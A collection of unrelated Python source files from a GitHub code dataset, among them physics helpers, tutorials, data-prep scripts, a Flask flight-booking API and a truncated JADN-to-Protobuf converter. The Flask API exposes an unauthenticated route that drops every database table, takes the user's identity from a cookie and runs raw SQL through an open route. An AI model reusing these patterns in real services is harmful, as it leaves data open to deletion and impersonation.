Srd_2=Erad/(a**2+(1-a**2)*np.sin(alpha)**2)/(1-p0s_fe+p0s_fe*np.exp(p1s_fe*(density*1e3*np.cos(zenith)-rho_avg)))**2/mag**1.8\n\n return Srd_2\n\n\ndef return_a(rho,avg,p0,p1,p2):\n a= p2+p0*np.exp(p1*(rho-avg))\n return a\n\n\n\ndef integrate(r,flu0,flu1):\n n=len(r)\n dr=r[1]-r[0]\n integral=0\n for i in np.arange(n-1):\n r0=r[i]\n r1=r[i+1]\n val0=r0*(flu0[i]+flu1[i])\n 
val1=r1*(flu0[i+1]+flu1[i+1])\n integral=integral+(val0+val1)*0.5*dr\n \n \n \n return 2*np.pi*integral#*6.2415e18 # to eV\n\ndef integrate_one_pol(r,flu):\n n=len(r)\n dr=r[1]-r[0]\n integral=0\n for i in np.arange(n-1):\n r0=r[i]\n r1=r[i+1]\n val0=r0*(flu[i])\n val1=r1*(flu[i+1])\n integral=integral+(val0+val1)*0.5*dr\n \n \n \n return 2*np.pi*integral#*6.2415e18 # to eV\n\n\ndef get_clipping(dxmax):\n \"\"\" get clipping correction\n \n Parameters\n ----------\n dxmax : float\n distance to shower maximum in g/cm^2\n \n Returns\n -------\n float\n fraction of radiation energy that is radiated in the atmosphere\n \n \"\"\"\n return 1 - np.exp(-8.7 * (dxmax * 1e-3 + 0.29) ** 1.89)\n","repo_name":"kmulrey/spectral_analysis","sub_path":"radiation_energy.py","file_name":"radiation_energy.py","file_ext":"py","file_size_in_byte":3114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29640038722","text":"#######################################################################################\n# 我们就获得了Month类型的枚举类,可以直接使用Month.Jan来引用一个常量,或者枚举它的所有成员:\n# value属性则是自动赋给成员的int常量,默认从1开始计数。\nfrom enum import Enum\nMonth = Enum('Month', ('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec'))\n\nfor name, member in Month.__members__.items():\n print(name, '=>', member, ',', member.value)\n\n# 如果需要更精确地控制枚举类型,可以从Enum派生出自定义类\nfrom enum import Enum, unique\n\n@unique\nclass Weekday(Enum):\n Sun = 0 # Sun的value被设定为0\n Mon = 1\n Tue = 2\n Wed = 3\n Thu = 4\n Fri = 5\n Sat = 6\n# 既可以用成员名称引用枚举常量,又可以直接根据value的值获得枚举常量\nprint(Weekday.Tue)\nprint(Weekday['Tue'])\nprint(Weekday.Tue.value)\nprint(Weekday(1))\nfor name, member in Weekday.__members__.items():\n print(name, '=>', member)\n\nfor value in Weekday.__members__.items():\n print(value)\n\nfor value in Weekday.__members__.values():\n print(value)\n\nfor value in Weekday.__members__.values():\n print(value.value)","repo_name":"quaner2557/ML_python","sub_path":"pythontry/ENUM.py","file_name":"ENUM.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"26948109991","text":"import random \nimport time\nfrom tkinter import Tk, Canvas, HIDDEN, NORMAL\n\n\nroot = Tk()\nroot.title('Snap')\nc = Canvas(root, width=400, height=400)\n\n\nshapes = []\n\n\ncircle = c.create_oval (35, 20, 365, 350, outline='black', fill='black', state=HIDDEN)\nshapes.append(circle)\ncircle = c.create_oval (35, 20, 365, 350, outline='red', fill='red', state=HIDDEN)\nshapes.append(circle)\ncircle = c.create_oval (35, 20, 365, 350, outline='green', fill='green', state=HIDDEN)\nshapes.append(circle)\ncircle = c.create_oval (35, 20, 365, 350, outline='blue', fill='blue', state=HIDDEN)\nshapes.append(circle)\n\n\nrectangle = c.create_rectangle(35, 100, 365, 270, outline='black')\nc.pack()","repo_name":"benjaminner/python-scripts","sub_path":"Book/snap.py","file_name":"snap.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"17305683872","text":"from utils import (\n highrisk_midrisk_lowrisk_splitter,\n make_empty_dataframe,\n make_age_column,\n make_monthly_income,\n make_marital_status,\n make_gender,\n make_no_of_dependents,\n)\nimport pandas as pd\n\n\ndef make_highrisk_dataframe(no_of_high_risk_datapoints):\n highrisk_df = make_empty_dataframe()\n\n age_distribution = {\"18-30\": 70, \"30-50\": 20, 
\"50-80\": 10}\n highrisk_df[\"age\"] = make_age_column(no_of_high_risk_datapoints, age_distribution)\n\n income_distribution = {\"40-60\": 5, \"60-80\": 5, \"80-100\": 60, \"100-200\": 30}\n highrisk_df[\"monthly_income\"] = make_monthly_income(\n no_of_high_risk_datapoints, income_distribution\n )\n\n marital_status_distribution = {\"married\": 30, \"unmarried\": 70}\n highrisk_df[\"marital_status\"] = make_marital_status(\n no_of_high_risk_datapoints, marital_status_distribution\n )\n\n gender_distribution = {\"male\": 70, \"female\": 30}\n highrisk_df[\"sex\"] = make_gender(no_of_high_risk_datapoints, gender_distribution)\n\n no_of_dependents_distribution = {0: 30, 1: 30, 2: 20, 3: 10, 4: 5, 5: 5}\n highrisk_df[\"no_of_dependents\"] = make_no_of_dependents(\n no_of_high_risk_datapoints, no_of_dependents_distribution\n )\n highrisk_df[\"risk\"] = [2] * no_of_high_risk_datapoints\n highrisk_df.to_csv(\"data/highrisk_dataset.csv\")\n\n return highrisk_df\n\n\ndef make_midrisk_dataframe(no_of_mid_risk_datapoints):\n midrisk_df = make_empty_dataframe()\n\n age_distribution = {\"18-30\": 40, \"30-50\": 35, \"50-80\": 25}\n midrisk_df[\"age\"] = make_age_column(no_of_mid_risk_datapoints, age_distribution)\n\n income_distribution = {\"10-20\": 5, \"20-40\": 25, \"40-60\": 70}\n midrisk_df[\"monthly_income\"] = make_monthly_income(\n no_of_mid_risk_datapoints, income_distribution\n )\n\n marital_status_distribution = {\"married\": 50, \"unmarried\": 50}\n midrisk_df[\"marital_status\"] = make_marital_status(\n no_of_mid_risk_datapoints, marital_status_distribution\n )\n\n gender_distribution = {\"male\": 50, \"female\": 50}\n midrisk_df[\"sex\"] = make_gender(no_of_mid_risk_datapoints, gender_distribution)\n\n no_of_dependents_distribution = {0: 5, 1: 20, 2: 30, 3: 30, 4: 10, 5: 5}\n midrisk_df[\"no_of_dependents\"] = make_no_of_dependents(\n no_of_mid_risk_datapoints, no_of_dependents_distribution\n )\n midrisk_df[\"risk\"] = [1] * no_of_mid_risk_datapoints\n midrisk_df.to_csv(\"data/midrisk_dataset.csv\")\n\n return midrisk_df\n\n\ndef make_lowrisk_dataframe(no_of_low_risk_datapoints):\n lowrisk_df = make_empty_dataframe()\n\n age_distribution = {\"18-30\": 10, \"30-50\": 20, \"50-80\": 70}\n lowrisk_df[\"age\"] = make_age_column(no_of_low_risk_datapoints, age_distribution)\n\n income_distribution = {\"10-20\": 10, \"20-40\": 20, \"40-60\": 70}\n lowrisk_df[\"monthly_income\"] = make_monthly_income(\n no_of_low_risk_datapoints, income_distribution\n )\n\n marital_status_distribution = {\"married\": 50, \"unmarried\": 50}\n lowrisk_df[\"marital_status\"] = make_marital_status(\n no_of_low_risk_datapoints, marital_status_distribution\n )\n\n gender_distribution = {\"male\": 50, \"female\": 50}\n lowrisk_df[\"sex\"] = make_gender(no_of_low_risk_datapoints, gender_distribution)\n\n no_of_dependents_distribution = {0: 5, 1: 5, 2: 10, 3: 20, 4: 30, 5: 30}\n lowrisk_df[\"no_of_dependents\"] = make_no_of_dependents(\n no_of_low_risk_datapoints, no_of_dependents_distribution\n )\n lowrisk_df[\"risk\"] = [0] * no_of_low_risk_datapoints\n lowrisk_df.to_csv(\"data/lowrisk_dataset.csv\")\n\n return lowrisk_df\n\n\ndef main():\n total_data_points = int(input(\"Enter total number of data points you need : \"))\n (\n no_of_highrisk_data_points,\n no_of_midrisk_data_points,\n no_of_low_risk_data_points,\n ) = highrisk_midrisk_lowrisk_splitter(total_data_points)\n make_highrisk_dataframe(no_of_highrisk_data_points)\n make_midrisk_dataframe(no_of_midrisk_data_points)\n 
make_lowrisk_dataframe(no_of_low_risk_data_points)\n df1 = pd.read_csv(\"data/highrisk_dataset.csv\")\n df2 = pd.read_csv(\"data/midrisk_dataset.csv\")\n df3 = pd.read_csv(\"data/lowrisk_dataset.csv\")\n df = pd.concat([df1, df2, df3])\n df.to_csv(\"data/dataset.csv\", index=False)\n\n\nmain()\n","repo_name":"JigarJoshi04/RiskAppetitePredictor-StockMarket","sub_path":"data_synthesizer/data_creator.py","file_name":"data_creator.py","file_ext":"py","file_size_in_byte":4233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42164603258","text":"from flask import Blueprint, request, jsonify, make_response, session\nimport os\nfrom App.common.ResData import ResData\nfrom App.ext import db\nfrom App.models import User, Flight, UserBuyRecord\n\nflightBlue = Blueprint(\"flight\", __name__)\n\n\ndef init_flightBlue(app):\n app.register_blueprint(blueprint=flightBlue)\n\n\n@flightBlue.route(\"/flight/createTable\", methods=[\"POST\", \"GET\"])\ndef createTable():\n db.drop_all()\n db.create_all()\n return \"sec\"\n\n\n@flightBlue.route(\"/flight/queryAll\", methods=[\"POST\", \"GET\"])\ndef queryAll():\n flights = Flight.query.filter().all()\n flightList = []\n for one in flights:\n flightList.append(one.to_json())\n flightsJson = {\"flights\": flightList}\n res = make_response(ResData.success(flightsJson))\n return res\n\n\n@flightBlue.route(\"/flight/search\", methods=[\"POST\"])\ndef search():\n startingPlace = request.form.get('startingPlace')\n endPlace = request.form.get('endPlace')\n startTime = request.form.get('startTime')\n flights = Flight.query.filter(Flight.startingPlace == startingPlace,\n Flight.endPlace == endPlace, Flight.startTime == startTime).all()\n flightList = []\n for one in flights:\n flightList.append(one.to_json())\n flightsJson = {\"flights\": flightList}\n res = make_response(ResData.success(flightsJson))\n return res\n\n\n@flightBlue.route(\"/flight/update\", methods=[\"POST\"])\ndef update():\n flightId = request.form.get(\"flightId\")\n if(flightId is None):\n return ResData.paramEmpty(flightId)\n flight = Flight.query.filter(Flight.flightId == flightId).first()\n\n startingPlace = request.form.get('startingPlace')\n endPlace = request.form.get('endPlace')\n startTime = request.form.get('startTime')\n endTime = request.form.get('endTime')\n flightNumber = request.form.get('flightNumber')\n price = request.form.get('price')\n flightName = request.form.get('flightName')\n number = request.form.get('number')\n\n flight.startingPlace = startingPlace\n flight.endPlace = endPlace\n flight.startTime = startTime\n flight.endTime = endTime\n flight.flightNumber = flightNumber\n flight.price = price\n flight.flightName = flightName\n flight.number = number\n\n db.session.add(flight)\n db.session.commit()\n return ResData.success(None)\n\n\n@flightBlue.route(\"/flight/insert\", methods=[\"POST\"])\ndef insert():\n startingPlace = request.form.get('startingPlace')\n endPlace = request.form.get('endPlace')\n startTime = request.form.get('startTime')\n endTime = request.form.get('endTime')\n flightNumber = request.form.get('flightNumber')\n price = request.form.get('price')\n flightName = request.form.get('flightName')\n number = request.form.get('number')\n flight = Flight()\n flight.startingPlace = startingPlace\n flight.endPlace = endPlace\n flight.startTime = startTime\n flight.endTime = endTime\n flight.flightNumber = flightNumber\n flight.price = price\n flight.flightName = flightName\n flight.number = number\n 
db.session.add(flight)\n db.session.commit()\n return ResData.success(None)\n\n\n@flightBlue.route(\"/flight/delete\", methods=[\"POST\"])\ndef delete():\n flightId = request.form.get('flightId')\n if(flightId is None):\n return ResData.paramEmpty(flightId)\n flight = Flight.query.filter(Flight.flightId == flightId).first()\n db.session.delete(flight)\n db.session.commit()\n return ResData.success(None)\n\n\n@flightBlue.route(\"/flight/buy\", methods=[\"POST\"])\ndef buy():\n flightId = request.form.get('flightId')\n userName = request.cookies.get('username')\n if(userName is None):\n return ResData.needLogin(flightId)\n if(flightId is None):\n return ResData.paramEmpty(flightId)\n flight = Flight.query.filter(Flight.flightId == flightId).first()\n flight.number = flight.number - 1\n\n userBuyRecord = UserBuyRecord()\n userBuyRecord.productId = flightId\n userBuyRecord.productType = \"flight\"\n userBuyRecord.userName = userName\n\n db.session.add(flight)\n db.session.add(userBuyRecord)\n db.session.commit()\n return ResData.success(None)\n\n@flightBlue.route(\"/flight/initSql\", methods=[\"POST\"])\ndef initSql():\n PATH = lambda p: os.path.abspath(os.path.join(os.path.dirname(__file__), p))\n p=os.path.realpath(__file__)\n cur_path = os.path.dirname(os.path.realpath(__file__))\n print(cur_path)\n path=cur_path +'\\sql\\init.sql'\n f = open(path,\"r\",encoding='UTF-8')\n txt=f.read()\n sql =\"INSERT INTO `post_record` (`postBy`, `postContent`, `postTitle`, `postTime`, `postPic`) VALUES ('admin', '官方网址:http://yuilibrary.com/YUI Editor 是雅虎的 YUI 包中的一个可视化HTML编辑器组件。', '土耳其三日游', '2019-05-12 14:45:01', NULL);\"\n data_query = db.session.execute(sql)\n db.session.commit()\n return ResData.success(None)","repo_name":"BaobaoAndDabao/tour","sub_path":"App/FlightApi.py","file_name":"FlightApi.py","file_ext":"py","file_size_in_byte":4876,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"8643534240","text":"# Importing dependencies\nimport pandas as pd\nimport numpy as np\nimport cv2\nimport os\nfrom sklearn.model_selection import train_test_split\n\n# Loading dataset\nmeta = pd.read_csv('meta.csv')\n\n# Dropping gender column\nmeta = meta.drop(['gender'], axis=1)\n\n# Filtaring dataset\nmeta = meta[meta['age'] >= 0]\nmeta = meta[meta['age'] <= 101]\n\n# Converting into numpy array\nmeta = meta.values\n\n# Spliting dataset into training and testing set\nD_train, D_test = train_test_split(meta, test_size=0.2, random_state=42)\n\n# Making the directory structure\nfor i in range(102):\n output_dir_train_male = 'dataset/age/train/' + str(i)\n output_dir_train_female = 'dataset/age/train/' + str(i)\n\n if not os.path.exists(output_dir_train_male):\n os.makedirs(output_dir_train_male)\n\n if not os.path.exists(output_dir_train_female):\n os.makedirs(output_dir_train_female)\n\n output_dir_test_male = 'dataset/age/test/' + str(i)\n output_dir_test_female = 'dataset/age/test/' + str(i)\n\n if not os.path.exists(output_dir_test_male):\n os.makedirs(output_dir_test_male)\n\n if not os.path.exists(output_dir_test_female):\n os.makedirs(output_dir_test_female)\n\n# Finally making the training and testing set\ncounter = 0\n\nfor image in D_train:\n img = cv2.imread(image[1], 1)\n img = cv2.resize(img, (128,128))\n cv2.imwrite('dataset/age/train/' + str(image[0]) + '/' + str(counter) + '.jpg', img)\n print('--('+str(counter)+')Processing--')\n counter += 1\n\ncounter = 0\n\nfor image in D_test:\n img = cv2.imread(image[1], 1)\n img = cv2.resize(img, 
(128,128))\n cv2.imwrite('dataset/age/test/' + str(image[0]) + '/' + str(counter) + '.jpg', img)\n print('--('+str(counter)+')Processing--')\n counter += 1\n\n\n","repo_name":"imdeepmind/processed-imdb-wiki-dataset","sub_path":"age.py","file_name":"age.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"76"} +{"seq_id":"11572029573","text":"import os\nimport sys\nimport subprocess\nimport types\nfrom multiprocessing import Pool\n\n\ndef apply(pool, args, kwargs):\n #pool.apply_async(call, args, kwargs)\n call(*args, **kwargs)\n\n\ndef call(*args, **_kwargs):\n kwargs=dict(stype=\"VEC\", qtype=-1, parameterless=None)\n kwargs.update(_kwargs)\n\n cmdargs = [\"mono-sgen\", \"--debug\", \"ExactIndexes.exe\"]\n for arg in args:\n cmdargs.append(arg)\n\n for k, v in kwargs.items():\n cmdargs.append(\"--\" + k)\n if v is None:\n pass\n elif isinstance(v, types.TupleType) or isinstance(v, types.ListType):\n cmdargs.append(\",\".join(map(str, v)))\n else:\n cmdargs.append(str(v))\n\n subprocess.call(cmdargs)\n\n\nBASE_ARGS = dict(\n parameterless=None,\n laesa=[4,8,16,32,64],\n spa=[4,8,16,32,64],\n sss=[0.4],\n bnc=[4,8,16,32,64],\n kvp=[4,8,16,32],\n milc=[4,8,16,32,64],\n ept=[4,8,16,32,64],\n lc=[1024,512,256,128,64]\n )\n\n\ndef main_real(pool):\n ### real datasets\n args = dict(BASE_ARGS.items())\n args[\"lc\"] = [1024,512,256,128,64]\n\n D=\"dbs/strings/dictionaries/English.dic\"\n Q=\"queries/dic-english.queries\"\n apply(pool, (), dict(database=D, queries=Q, stype=\"STR-ED\", **args))\n \n D=\"dbs/strings/wiktionary/english.tsv\"\n Q=\"queries/wiktionary-english.queries\"\n apply(pool, (), dict(database=D, queries=Q, stype=\"WIKTIONARY\", **args))\n\n D=\"dbs/cophir/cophir1M\"\n Q=\"queries/cophir-208.queries\"\n apply(pool, (), dict(database=D, queries=Q, **args))\n\n D=\"dbs/sift/ascii/sift_base\"\n Q=\"dbs/sift/ascii/sift_query-256.vecs\"\n apply(pool, (), dict(database=D, queries=Q, **args))\n sys.exit(0)\n\n args[\"lc\"].append(32)\n D=\"dbs/vectors/nasa/nasa-20-40150\"\n Q=\"queries/nasa.queries\"\n apply(pool, (), dict(database=D, queries=Q, **args))\n args[\"lc\"].append(16)\n\n D=\"dbs/vectors/colors/colors-112-112682\"\n Q=\"queries/colors.queries\"\n apply(pool, (), dict(database=D, queries=Q, **args))\n\n\ndef main_n(pool):\n args = dict(BASE_ARGS.items())\n\n for n in [100000, 300000, 1000000, 3000000]:\n for dim in [4, 12]:\n if dim == 4:\n args[\"lc\"] = [1024,512,256]\n else:\n args[\"lc\"] = [1024,512,256,128,64]\n D=\"dbs/vectors/random/db.random.%d.%d\" % (dim, n)\n Q=\"queries/random-%d.queries\" % dim\n apply(pool, (), dict(database=D, queries=Q, **args))\n\n\ndef main_dimension(pool):\n args = dict(BASE_ARGS.items())\n\n for dim in [4, 8, 12, 16, 20, 24]:\n n=1000000\n D=\"dbs/vectors/random/db.random.%d.%d\" % (dim, n)\n Q=\"queries/random-%d.queries\" % dim\n if dim >= 16:\n args[\"lc\"] = [128, 64, 32, 16]\n apply(pool, (), dict(database=D, queries=Q, **args))\n\n\ndef main():\n p = Pool(processes=16)\n main_real(p)\n main_n(p)\n main_dimension(p)\n p.close()\n p.join()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"sadit/natix","sub_path":"utils/exp-exact.py","file_name":"exp-exact.py","file_ext":"py","file_size_in_byte":2942,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"71714990646","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# Author: Yu Zhou\n\n# 46. 
Permutations\n# Given a collection of distinct numbers, return all possible permutations.\n\n\n\n# 思路\n# 基础地轨思路\n\nclass Solution(object):\n def permute(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n self.res = []\n def dfs(nums, temp):\n if len(temp) == len(nums):\n self.res.append(temp[:])\n\n for i in xrange(len(nums)):\n if nums[i] in temp:\n continue\n temp.append(nums[i])\n dfs(nums, temp)\n temp.pop()\n dfs(nums, [])\n return self.res\n \n","repo_name":"tech-cow/leetcode","sub_path":"backtrack/Yu/46.py","file_name":"46.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":1339,"dataset":"github-code","pt":"76"} +{"seq_id":"25869285487","text":"from xml.etree import ElementTree as ET\n\nfixlet = \"\"\"\n\n\t\n\t\n\n\"\"\"\n\nfixletaction = \"\"\"\n\n \n Click \n here\n \n \n \n\n\"\"\"\n\ndef createFixlet(id, title, description, relevance, actions, parameters, MIMEfields):\n t = ET.ElementTree(ET.fromstring(fixlet))\n f = t.getroot()[0]\n \n node = ET.Element(\"Title\")\n node.text = title\n f.append(node)\n \n node = ET.Element(\"Description\")\n lines = \"\"\n for line in description:\n lines += line + \"\\n\"\n node.text = lines\n f.append(node)\n\n for expression in relevance:\n node = ET.Element(\"Relevance\")\n node.text = expression\n f.append(node)\n\n #parameters\n for (key, value) in parameters.items():\n node = ET.Element(key)\n node.text = value\n f.append(node)\n\n for MIME in MIMEfields:\n f.append(MIME)\n \n for action in actions:\n f.append(action)\n \n t.write(str(id) + \" - \" + title + \".bes\")\n \ndef createAction(ID, postLink, action):\n a = ET.fromstring(fixletaction)\n a.set('ID', ID)\n node = a.find(\"Description\")\n node.find(\"PostLink\").text = postLink\n node = a.find(\"ActionScript\")\n lines = \"\"\n for line in action:\n lines += line + \"\\n\"\n node.text = lines\n return a","repo_name":"bigfix/iemcog","sub_path":"contentgenerator.py","file_name":"contentgenerator.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"39539612562","text":"#Map Functuion........\ndef shamim(a):\n return a*a\n\n#map function first use function, iterable value like list.......\nval = [10,20, 30, 40, 50]\ncollect = list(map(shamim, val))\nprint(collect)\n\n\n#Filter Function........\n\nnum = [5,11,23,30,40,50]\n\nresult = list(filter(lambda x : x%2==0, num))\nprint(result)\n\n#Ex.............................................\nnum = [5,11,23,30,40,50]\n\nfor i in num:\n print(\"loop result : \", i*i)\n\nresult = (lambda x : x%2==0)(5)\nprint(result)","repo_name":"CodeWithShamim/python-t-code","sub_path":"Function_/Map and Filter Fucntion.py","file_name":"Map and Filter Fucntion.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"70103275767","text":"import cv2\nimport sys\nimport numpy as np\nimport heapq\nfrom display_utils import side_by_side, Tagged, Spacer, Vertical, Horizontal\n\ndef mfilter(data, filter_size):\n indexer = filter_size // 2\n window = [\n (i, j)\n for i in range(-indexer, filter_size-indexer)\n for j in range(-indexer, filter_size-indexer)\n ]\n index = len(window) // 2\n d = data.shape[1]\n s = data.shape[0]\n for i in range(data.shape[0]):\n for j in range(d):\n data[i,j] = heapq.nsmallest(index+1,\n (0 if (\n min(i+a, j+b) < 0\n or s <= i+a\n or d <= j+b\n ) else 
data[i+a, j+b]\n for a, b in window)\n )[index]\n return data\n\nimage = cv2.imread(sys.argv[1] if len(sys.argv) > 1 else 'test.png')\n\nhow_much_spice = float(sys.argv[2] if len(sys.argv) > 2 else 0.06)\nhow_much_blur = int(sys.argv[3] if len(sys.argv) > 3 else 3)\nrgb_spice = True # False for true \"Pepper and Salt\"\n\nnoisy = np.copy(image)\n\nif rgb_spice:\n noise = np.random.rand(*image.shape) * 255\n noise = noise < (255 * how_much_spice)\n noisy[noise] = 255\nelse:\n black = noise < (255 * how_much_spice)\n white = noise > (255 * (1 - how_much_spice))\n noisy[black] = [0,0,0]\n noisy[white] = [255,255,255]\n\n\n## cv2 denoise\ncv_denoise = cv2.medianBlur(noisy, how_much_blur)\n\n## manual denoise\ndenoise = np.copy(noisy)\ndenoise[:,:,0] = mfilter(denoise[:,:,0], how_much_blur)\ndenoise[:,:,1] = mfilter(denoise[:,:,1], how_much_blur)\ndenoise[:,:,2] = mfilter(denoise[:,:,2], how_much_blur)\n\ncv2.imshow('result', side_by_side(\n Tagged('Median Filter Denoise - AliMPFard', Vertical(\n Spacer(40),\n Horizontal(\n Tagged('Original', 0, fill='rgb(0,0,255)'),\n Spacer(image.shape[1] // 15),\n Tagged('Noisy', 1, fill='rgb(0,0,255)')\n ),\n Spacer(image.shape[0] // 15),\n Horizontal(\n Tagged('CV2', 2, fill='rgb(0,0,255)'),\n Spacer(image.shape[1] // 15),\n Tagged('Mine', 3, fill='rgb(0,0,255)')\n )\n ), fill='#a0736c'),\n image,\n noisy,\n cv_denoise,\n denoise)\n)\n\nwhile cv2.waitKey(0) != ord('q'):\n pass\n\ncv2.destroyAllWindows()\n","repo_name":"alimpfard/image-processing-stuff","sub_path":"noise_denoise.py","file_name":"noise_denoise.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"20913224108","text":"import os\r\nfrom os import getcwd\r\nimport xml.etree.ElementTree as ET\r\n\r\n\r\ntrain_image_path = './trainval/VOCdevkit/VOC2012/JPEGImages/'\r\ntrain_xml_path = './trainval/VOCdevkit/VOC2012/Annotations/'\r\n\r\n#test_image_path = './test/VOCdevkit/VOC2007/JPEGImages/'\r\n#test_xml_path = './test/VOCdevkit/VOC2007/Annotations/'\r\n\r\ntrainval_file = 'trainval_set_2012.txt'\r\n#test_file = 'test_set.txt'\r\n\r\n\r\ntrain_image_directory = os.listdir(train_image_path)\r\ntrain_images = [train_image_path + image for image in train_image_directory]\r\n\r\ntrain_xml_directory = os.listdir(train_xml_path)\r\ntrain_xmls = [train_xml_path + xml for xml in train_xml_directory]\r\n\r\n#test_image_directory = os.listdir(test_image_path)\r\n#test_images = [test_image_path + image for image in test_image_directory]\r\n\r\n#test_xml_directory = os.listdir(test_xml_path)\r\n#test_xmls = [test_xml_path + xml for xml in test_xml_directory]\r\n\r\nworking_directory = getcwd()\r\n\r\n\r\nclasses = [\"aeroplane\", \"bicycle\", \"bird\", \"boat\", \"bottle\", \"bus\", \"car\", \"cat\", \"chair\", \"cow\", \"diningtable\", \"dog\", \"horse\", \"motorbike\", \"person\", \"pottedplant\", \"sheep\", \"sofa\", \"train\", \"tvmonitor\"]\r\n\r\n\r\ndef processing_dataset(image_fullname, xml_fullname, file_name):\r\n xml_file = open(xml_fullname)\r\n tree = ET.parse(xml_file)\r\n root = tree.getroot()\r\n row = \"\"\r\n \r\n for obj in root.findall('object'):\r\n name = obj.find('name').text\r\n if name not in classes:\r\n continue\r\n \r\n class_id = classes.index(name)\r\n bndbox = obj.find('bndbox')\r\n xmin = bndbox.find('xmin').text\r\n ymin = bndbox.find('ymin').text\r\n xmax = bndbox.find('xmax').text\r\n ymax = bndbox.find('ymax').text\r\n \r\n row = row + \" \" + str(xmin) + \",\" + str(ymin) 
+ \",\" + str(xmax) + \",\" + str(ymax) + \",\" + str(class_id)\r\n \r\n if row != \"\":\r\n list_file = open(file_name, 'a')\r\n file_string = working_directory + str(image_fullname)[1:] + row + '\\n'\r\n list_file.write(file_string)\r\n list_file.close()\r\n\r\n\r\nfor i in range(len(train_xmls)):\r\n train_image_fullname = train_images[i]\r\n train_xml_fullname = train_xmls[i]\r\n processing_dataset(train_image_fullname, train_xml_fullname, trainval_file)\r\n \r\n \r\n\r\n#for j in range(len(test_xmls)):\r\n# test_image_fullname = test_images[j]\r\n# test_xml_fullname = test_xmls[j]\r\n# processing_dataset(test_image_fullname, test_xml_fullname, test_file)","repo_name":"nihan139/Real-Time-Object-Detection-for-Blind-People","sub_path":"YOLOV3/processing_data_from_xml.py","file_name":"processing_data_from_xml.py","file_ext":"py","file_size_in_byte":2454,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"34263086104","text":"import timeit\n\ndeclaration_1 = \"\"\"\nfor_test(10)\n\"\"\"\n\nsetup_1 = \"\"\"\ndef for_test(number):\n my_list = []\n for num in range(1, number + 1):\n my_list.append(num)\n return my_list\n\"\"\"\n\ndeclaration_2 = \"\"\"\nwhile_test(10)\n\"\"\"\n\nsetup_2 = \"\"\"\ndef while_test(number):\n my_list = []\n counter = 1\n while counter <= number:\n my_list.append(counter)\n counter += 1\n return my_list\n\"\"\"\n\nlength_1 = timeit.timeit(declaration_1, setup_1, number=1000000)\nlength_2 = timeit.timeit(declaration_2, setup_2, number=1000000)\n\nprint(length_1)\nprint(length_2)\n\n","repo_name":"Afreen89/16-projects-in-Python","sub_path":"Day9/measure_time2.py","file_name":"measure_time2.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"4332647839","text":"import json\nimport re\n\nfrom datetime import datetime\n\nfrom ..codec.codec_utils import fopts_s2d, topts_s2d\nfrom ..utils import Utils\n\n\nclass JADNtoProto3(object):\n def __init__(self, jadn):\n \"\"\"\n Schema Converter for JADN to ProtoBuf3\n :param jadn: str or dict of the JADN schema\n :type jadn: str or dict\n \"\"\"\n if type(jadn) is str:\n try:\n jadn = json.loads(jadn)\n except Exception as e:\n raise e\n elif type(jadn) is dict:\n pass\n\n else:\n raise TypeError('JADN improperly formatted')\n\n self.indent = ' '\n\n self._fieldMap = {\n 'Binary': 'string',\n 'Boolean': 'bool',\n 'Integer': 'int64',\n 'Number': 'string',\n 'Null': 'string',\n 'String': 'string'\n }\n self._structFormats = {\n 'Record': self._formatRecord,\n 'Choice': self._formatChoice,\n 'Map': self._formatMap,\n 'Enumerated': self._formatEnumerated,\n 'Array': self._formatArray,\n 'ArrayOf': self._formatArrayOf,\n }\n\n self._imports = []\n self._meta = jadn['meta'] or []\n self._types = []\n self._custom = []\n self._customFields = [] # [t[0] for t in self._types]\n\n for t in jadn['types']:\n if t[1] in self._structFormats.keys():\n self._types.append(t)\n self._customFields.append(t[0])\n else:\n self._custom.append(t)\n\n def proto_dump(self):\n \"\"\"\n Converts the JADN schema to Protobuf3\n :return: Protobuf3 schema\n :rtype str\n \"\"\"\n return '{header}{imports}{defs}\\n/* JADN Custom Fields\\n[\\n{jadn_fields}\\n]\\n*/'.format(\n idn=self.indent,\n header=self.makeHeader(),\n defs=self.makeStructures(),\n imports=''.join(['import \\\"{}\\\";\\n'.format(i) for i in self._imports]),\n jadn_fields=',\\n'.join([self.indent+json.dumps(f) for f in 
